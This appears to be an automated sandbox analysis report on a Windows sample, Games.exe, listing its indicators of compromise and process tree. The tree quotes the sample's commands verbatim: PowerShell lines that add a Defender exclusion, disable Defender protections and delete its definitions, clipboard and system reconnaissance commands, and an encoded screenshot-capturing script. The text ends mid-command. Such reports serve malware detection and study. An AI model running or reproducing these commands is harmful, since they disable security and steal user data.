Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	AME Wizard Beta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	AME Wizard Beta.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257"	AME Wizard Beta.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202	AME Wizard Beta.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 832123.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
672	powershell.exe
3160	powershell.exe
672	powershell.exe
3160	powershell.exe
1416	powershell.exe
1416	powershell.exe
1416	powershell.exe
2244	powershell.exe
2244	powershell.exe
2244	powershell.exe
1204	powershell.exe
1204	powershell.exe
4776	powershell.exe
4776	powershell.exe
4916	msedge.exe
4916	msedge.exe
4428	msedge.exe
4428	msedge.exe
1952	identity_helper.exe
1952	identity_helper.exe
4984	msedge.exe
4984	msedge.exe
4912	msedge.exe
4912	msedge.exe
2656	identity_helper.exe
2656	identity_helper.exe
2736	msedge.exe
2736	msedge.exe
2428	powershell.exe
2428	powershell.exe
216	powershell.exe
216	powershell.exe
2428	powershell.exe
216	powershell.exe
5492	powershell.exe
5492	powershell.exe
5492	powershell.exe
5616	powershell.exe
5616	powershell.exe
5616	powershell.exe
5472	powershell.exe
5472	powershell.exe
452	powershell.exe
452	powershell.exe
1244	chrome.exe
1244	chrome.exe
1244	chrome.exe
5680	taskmgr.exe
5680	taskmgr.exe
5680	taskmgr.exe
5680	taskmgr.exe
5680	taskmgr.exe
5680	taskmgr.exe
5680	taskmgr.exe
5680	taskmgr.exe
5680	taskmgr.exe
5680	taskmgr.exe
5680	taskmgr.exe
5680	taskmgr.exe
4352	chrome.exe
4352	chrome.exe
6076	AME Wizard Beta.exe
6076	AME Wizard Beta.exe
6052	AME Wizard Beta.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
6076	AME Wizard Beta.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 45 IoCs

pid	Process
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
1244	chrome.exe
1244	chrome.exe
1244	chrome.exe
4352	chrome.exe
4352	chrome.exe
4352	chrome.exe
4352	chrome.exe
4352	chrome.exe
4352	chrome.exe
4352	chrome.exe
4352	chrome.exe
4352	chrome.exe
5576	msedge.exe
5576	msedge.exe
5576	msedge.exe
5576	msedge.exe
5576	msedge.exe
5576	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	672	powershell.exe
Token: SeDebugPrivilege	3160	powershell.exe
Token: SeDebugPrivilege	2272	tasklist.exe
Token: SeDebugPrivilege	3512	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1756	WMIC.exe
Token: SeSecurityPrivilege	1756	WMIC.exe
Token: SeTakeOwnershipPrivilege	1756	WMIC.exe
Token: SeLoadDriverPrivilege	1756	WMIC.exe
Token: SeSystemProfilePrivilege	1756	WMIC.exe
Token: SeSystemtimePrivilege	1756	WMIC.exe
Token: SeProfSingleProcessPrivilege	1756	WMIC.exe
Token: SeIncBasePriorityPrivilege	1756	WMIC.exe
Token: SeCreatePagefilePrivilege	1756	WMIC.exe
Token: SeBackupPrivilege	1756	WMIC.exe
Token: SeRestorePrivilege	1756	WMIC.exe
Token: SeShutdownPrivilege	1756	WMIC.exe
Token: SeDebugPrivilege	1756	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1756	WMIC.exe
Token: SeRemoteShutdownPrivilege	1756	WMIC.exe
Token: SeUndockPrivilege	1756	WMIC.exe
Token: SeManageVolumePrivilege	1756	WMIC.exe
Token: 33	1756	WMIC.exe
Token: 34	1756	WMIC.exe
Token: 35	1756	WMIC.exe
Token: 36	1756	WMIC.exe
Token: SeDebugPrivilege	1416	powershell.exe
Token: SeIncreaseQuotaPrivilege	1756	WMIC.exe
Token: SeSecurityPrivilege	1756	WMIC.exe
Token: SeTakeOwnershipPrivilege	1756	WMIC.exe
Token: SeLoadDriverPrivilege	1756	WMIC.exe
Token: SeSystemProfilePrivilege	1756	WMIC.exe
Token: SeSystemtimePrivilege	1756	WMIC.exe
Token: SeProfSingleProcessPrivilege	1756	WMIC.exe
Token: SeIncBasePriorityPrivilege	1756	WMIC.exe
Token: SeCreatePagefilePrivilege	1756	WMIC.exe
Token: SeBackupPrivilege	1756	WMIC.exe
Token: SeRestorePrivilege	1756	WMIC.exe
Token: SeShutdownPrivilege	1756	WMIC.exe
Token: SeDebugPrivilege	1756	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1756	WMIC.exe
Token: SeRemoteShutdownPrivilege	1756	WMIC.exe
Token: SeUndockPrivilege	1756	WMIC.exe
Token: SeManageVolumePrivilege	1756	WMIC.exe
Token: 33	1756	WMIC.exe
Token: 34	1756	WMIC.exe
Token: 35	1756	WMIC.exe
Token: 36	1756	WMIC.exe
Token: SeDebugPrivilege	4084	tasklist.exe
Token: SeDebugPrivilege	2244	powershell.exe
Token: SeIncreaseQuotaPrivilege	4844	WMIC.exe
Token: SeSecurityPrivilege	4844	WMIC.exe
Token: SeTakeOwnershipPrivilege	4844	WMIC.exe
Token: SeLoadDriverPrivilege	4844	WMIC.exe
Token: SeSystemProfilePrivilege	4844	WMIC.exe
Token: SeSystemtimePrivilege	4844	WMIC.exe
Token: SeProfSingleProcessPrivilege	4844	WMIC.exe
Token: SeIncBasePriorityPrivilege	4844	WMIC.exe
Token: SeCreatePagefilePrivilege	4844	WMIC.exe
Token: SeBackupPrivilege	4844	WMIC.exe
Token: SeRestorePrivilege	4844	WMIC.exe
Token: SeShutdownPrivilege	4844	WMIC.exe
Token: SeDebugPrivilege	4844	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4844	WMIC.exe
Token: SeRemoteShutdownPrivilege	4844	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4428	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe
4912	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
220	firefox.exe
6076	AME Wizard Beta.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4536 wrote to memory of 4060	4536	Games.exe	83
PID 4536 wrote to memory of 4060	4536	Games.exe	83
PID 4060 wrote to memory of 2180	4060	Games.exe	84
PID 4060 wrote to memory of 2180	4060	Games.exe	84
PID 4060 wrote to memory of 4544	4060	Games.exe	85
PID 4060 wrote to memory of 4544	4060	Games.exe	85
PID 2180 wrote to memory of 672	2180	cmd.exe	88
PID 2180 wrote to memory of 672	2180	cmd.exe	88
PID 4544 wrote to memory of 3160	4544	cmd.exe	89
PID 4544 wrote to memory of 3160	4544	cmd.exe	89
PID 4060 wrote to memory of 1348	4060	Games.exe	90
PID 4060 wrote to memory of 1348	4060	Games.exe	90
PID 4060 wrote to memory of 528	4060	Games.exe	91
PID 4060 wrote to memory of 528	4060	Games.exe	91
PID 1348 wrote to memory of 2272	1348	cmd.exe	94
PID 1348 wrote to memory of 2272	1348	cmd.exe	94
PID 528 wrote to memory of 3512	528	cmd.exe	95
PID 528 wrote to memory of 3512	528	cmd.exe	95
PID 4060 wrote to memory of 3464	4060	Games.exe	96
PID 4060 wrote to memory of 3464	4060	Games.exe	96
PID 4060 wrote to memory of 2340	4060	Games.exe	97
PID 4060 wrote to memory of 2340	4060	Games.exe	97
PID 4060 wrote to memory of 1084	4060	Games.exe	101
PID 4060 wrote to memory of 1084	4060	Games.exe	101
PID 3464 wrote to memory of 1756	3464	cmd.exe	103
PID 3464 wrote to memory of 1756	3464	cmd.exe	103
PID 2340 wrote to memory of 1416	2340	cmd.exe	104
PID 2340 wrote to memory of 1416	2340	cmd.exe	104
PID 4060 wrote to memory of 4796	4060	Games.exe	105
PID 4060 wrote to memory of 4796	4060	Games.exe	105
PID 4060 wrote to memory of 772	4060	Games.exe	107
PID 4060 wrote to memory of 772	4060	Games.exe	107
PID 1084 wrote to memory of 4520	1084	cmd.exe	109
PID 1084 wrote to memory of 4520	1084	cmd.exe	109
PID 4060 wrote to memory of 2644	4060	Games.exe	110
PID 4060 wrote to memory of 2644	4060	Games.exe	110
PID 4796 wrote to memory of 4084	4796	cmd.exe	112
PID 4796 wrote to memory of 4084	4796	cmd.exe	112
PID 2644 wrote to memory of 2244	2644	cmd.exe	113
PID 2644 wrote to memory of 2244	2644	cmd.exe	113
PID 4060 wrote to memory of 1848	4060	Games.exe	114
PID 4060 wrote to memory of 1848	4060	Games.exe	114
PID 772 wrote to memory of 644	772	cmd.exe	116
PID 772 wrote to memory of 644	772	cmd.exe	116
PID 1848 wrote to memory of 3756	1848	cmd.exe	118
PID 1848 wrote to memory of 3756	1848	cmd.exe	118
PID 4060 wrote to memory of 4232	4060	Games.exe	119
PID 4060 wrote to memory of 4232	4060	Games.exe	119
PID 4232 wrote to memory of 4992	4232	cmd.exe	121
PID 4232 wrote to memory of 4992	4232	cmd.exe	121
PID 4060 wrote to memory of 3484	4060	Games.exe	122
PID 4060 wrote to memory of 3484	4060	Games.exe	122
PID 3484 wrote to memory of 4508	3484	cmd.exe	124
PID 3484 wrote to memory of 4508	3484	cmd.exe	124
PID 4060 wrote to memory of 4612	4060	Games.exe	125
PID 4060 wrote to memory of 4612	4060	Games.exe	125
PID 2244 wrote to memory of 3320	2244	powershell.exe	127
PID 2244 wrote to memory of 3320	2244	powershell.exe	127
PID 4612 wrote to memory of 4532	4612	cmd.exe	128
PID 4612 wrote to memory of 4532	4612	cmd.exe	128
PID 4060 wrote to memory of 4576	4060	Games.exe	129
PID 4060 wrote to memory of 4576	4060	Games.exe	129
PID 4576 wrote to memory of 4172	4576	cmd.exe	131
PID 4576 wrote to memory of 4172	4576	cmd.exe	131

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Games.exe
"C:\Users\Admin\AppData\Local\Temp\Games.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4536
- C:\Users\Admin\AppData\Local\Temp\Games.exe
  "C:\Users\Admin\AppData\Local\Temp\Games.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Games.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2180
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Games.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1348
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:528
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3464
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:2340
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1084
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4796
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:772
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2644
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcAB